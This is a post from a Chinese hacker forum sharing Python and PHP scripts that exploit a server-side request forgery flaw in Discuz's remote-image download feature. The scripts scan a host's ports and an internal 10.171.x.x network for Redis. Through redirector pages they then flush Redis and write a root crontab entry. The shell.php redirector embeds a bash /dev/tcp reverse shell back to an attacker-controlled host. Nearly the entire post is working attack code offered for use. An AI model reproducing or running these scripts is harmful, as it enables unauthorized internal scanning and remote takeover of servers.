搜索
查看: 841|回复: 0

Discuz ssrf漏洞利用的几个python脚本

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2017-2-24 11:34:00 | 显示全部楼层 |阅读模式
扫描本机开放的端口:
  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-
  3. # @Author: Lcy
  4. # @Date:   2016-07-05 20:55:30
  5. # @Last Modified by:   Lcy
  6. # @Last Modified time: 2016-10-10 16:26:14
  7. import requests
  8. import threading
  9. import Queue
  10. import time

  11. threads_count = 2
  12. que = Queue.Queue()
  13. lock = threading.Lock()
  14. threads = []
  15. ports = [21,22,23,25,69,80,81,82,83,84,110,389,389,443,445,488,512,513,514,873,901,1043,1080,1099,1090,1158,1352,1433,1434,1521,2049,2100,2181,2601,2604,3128,3306,3307,3389,4440,4444,4445,4848,5000,5280,5432,5500,5632,5900,5901,5902,5903,5984,6000,6033,6082,6379,6666,7001,7001,7002,7070,7101,7676,7777,7899,7988,8000,8001,8002,8003,8004,8005,8006,8007,8008,8009,8069,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8098,8099,8980,8990,8443,8686,8787,8880,8888,9000,9001,9043,9045,9060,9080,9081,9088,9088,9090,9091,9100,9200,9300,9443,9871,9999,10000,10068,10086,11211,20000,22022,22222,27017,28017,50060,50070]
  16. for i in ports:
  17.     que.put(str(i))
  18. def run():
  19.     while que.qsize() > 0:
  20.         p = que.get()
  21.         print p + "       \r",
  22.         try:
  23.             url = "http://bbs.phpinfo.me/forum.php?mod=ajax&action=downremoteimg&message=[img]http://tools.phpinfo.me/ssrf.php?s=ftp%26ip=127.0.0.1%26port={port}%26data=helo.jpg[/img]".format(
  24.                 port=p)
  25.             r = requests.get(url,timeout=2.8)
  26.         except:
  27.             lock.acquire()
  28.             print "{port}  Open".format(port=p)
  29.             lock.release()
  30. for i in range(threads_count):
  31.     t = threading.Thread(target=run)
  32.     threads.append(t)
  33.     t.setDaemon(True)
  34.     t.start()

  35. while que.qsize() > 0:
  36.     time.sleep(1.0)
复制代码
扫描内网开放6379端口的主机:
  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-
  3. # @Author: Lcy
  4. # @Date:   2016-07-05 20:55:30
  5. # @Last Modified by:   Lcy
  6. # @Last Modified time: 2016-07-21 14:38:04
  7. import requests
  8. import threading
  9. import Queue
  10. import time
  11. threads_count = 20
  12. que = Queue.Queue()
  13. lock = threading.Lock()
  14. threads = []
  15. ip = "10.171."
  16. for i in range(1,255):
  17.     for j in range(1,255):
  18.         que.put(ip + str(i) + '.'+str(j))
  19. # for i in range(0,255):
  20. #     que.put(ip + str(i))
  21. def run():
  22.     while que.qsize() > 0:
  23.         ip = que.get()
  24.         try:
  25.             url = "http://bbs.phpinfo.me/forum.php?mod=ajax&action=downremoteimg&message=[img]http://tools.phpinfo.me/ssrf.php?s=ftp%26ip={ip}%26port={port}%26data=helo.jpg[/img]".format(
  26.                 ip=ip,
  27.                 port="65321")
  28.             r = requests.get(url,timeout=5)
  29.             
  30.             try:
  31.                 url = "https://bbs.phpinfo.me/forum.php?mod=ajax&action=downremoteimg&message=[img]http://tools.phpinfo.me/ssrf.php?s=ftp%26ip={ip}%26port={port}%26data=helo.jpg[/img]".format(
  32.                 ip=ip,
  33.                 port="6379")
  34.                 r = requests.get(url,timeout=5)
  35.                 lock.acquire()
  36.                 print ip
  37.                 lock.release()
  38.             except :
  39.                 lock.acquire()
  40.                 print "{ip}  6379 Open".format(ip=ip)
  41.                 lock.release()
  42.         except:
  43.             pass

  44. for i in range(threads_count):
  45.     t = threading.Thread(target=run)
  46.     threads.append(t)
  47.     t.setDaemon(True)
  48.     t.start()
  49. while que.qsize() > 0:
  50.     time.sleep(1.0)
复制代码
通过ssrf操作内网redis写任务计划反弹shell:
  1. #!/usr/bin/env python
  2. # coding=utf-8
  3. # email: ringzero@0x557.org

  4. import requests

  5. host = '10.171.26.22'
  6. port = '6379'
  7. bhost = 'phpinfo.me'
  8. bport = '32'

  9. vul_httpurl = 'https://bbs.phpinfo.me/forum.php?mod=ajax&action=downremoteimg&message=[img]'

  10. _location = 'http://tools.phpinfo.me/ssrf.php'

  11. shell_location = 'http://tools.phpinfo.me/shell.php'


  12. #1 flush db

  13. _payload = '?s=dict%26ip={host}%26port={port}%26data=flushall'.format(

  14.     host = host,

  15.     port = port)

  16. exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(_location, _payload, vul_httpurl=vul_httpurl)

  17. print exp_uri

  18. print len(requests.get(exp_uri).content)



  19. #2 set crontab command

  20. _payload = '?s=dict%26ip={host}%26port={port}%26bhost={bhost}%26bport={bport}'.format(

  21.     host = host,

  22.     port = port,

  23.     bhost = bhost,

  24.     bport = bport)

  25. exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(shell_location, _payload, vul_httpurl=vul_httpurl)

  26. print exp_uri

  27. print len(requests.get(exp_uri).content)



  28. #3 config set dir /var/spool/cron/

  29. _payload = '?s=dict%26ip={host}%26port={port}%26data=config:set:dir:/var/spool/cron/'.format(

  30.     host = host,

  31.     port = port)

  32. exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(_location, _payload, vul_httpurl=vul_httpurl)

  33. print exp_uri

  34. print len(requests.get(exp_uri).content)



  35. #4 config set dbfilename root

  36. _payload = '?s=dict%26ip={host}%26port={port}%26data=config:set:dbfilename:root'.format(

  37.     host = host,

  38.     port = port)

  39. exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(_location, _payload, vul_httpurl=vul_httpurl)

  40. print exp_uri

  41. print len(requests.get(exp_uri).content)



  42. #5 save to file

  43. _payload = '?s=dict%26ip={host}%26port={port}%26data=save'.format(

  44.     host = host,

  45.     port = port)

  46. exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(_location, _payload, vul_httpurl=vul_httpurl)

  47. print exp_uri

  48. print len(requests.get(exp_uri).content)
复制代码
ssrf.php:
  1. <?php

  2. $ip = $_GET['ip'];



  3. $port = $_GET['port'];



  4. $scheme = $_GET['s'];



  5. $data = $_GET['data'];



  6. header("Location: $scheme://$ip:$port/$data");



  7. ?>
复制代码
shell.php
  1. <?php

  2. $ip = $_GET['ip'];

  3. $port = $_GET['port'];

  4. $bhost = $_GET['bhost'];

  5. $bport = $_GET['bport'];

  6. $scheme = $_GET['s'];

  7. header("Location: $scheme://$ip:$port/set:0:"\\x0a\\x0a*/1\\x20*\\x20*\\x20*\\x20*\\x20/bin/bash\\x20-i\\x20>\\x26\\x20/dev/tcp/{$bhost}/{$bport}\\x200>\\x261\\x0a\\x0a\\x0a"");

  8. ?>
复制代码

from:https://phpinfo.me/2017/02/23/1438.html
过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表